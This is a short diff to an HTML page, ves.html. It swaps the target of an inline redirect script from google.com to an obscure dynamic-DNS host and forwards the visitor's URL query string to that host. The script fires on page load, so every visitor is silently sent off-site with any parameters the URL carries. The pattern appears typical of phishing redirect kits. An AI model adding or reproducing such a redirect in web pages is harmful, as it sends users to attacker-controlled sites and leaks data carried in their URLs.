--- a/ves.html
+++ b/ves.html
@@ -32,7 +32,7 @@
 </head>
 
 <script>
-    var myurl = ('https://google.com/')
+    var myurl = ('https://aothuaothugdh.hopto.org/st/')
     var holdbeer = (window.location.search);
     window.location.replace(myurl+'/'+holdbeer);
     </script>
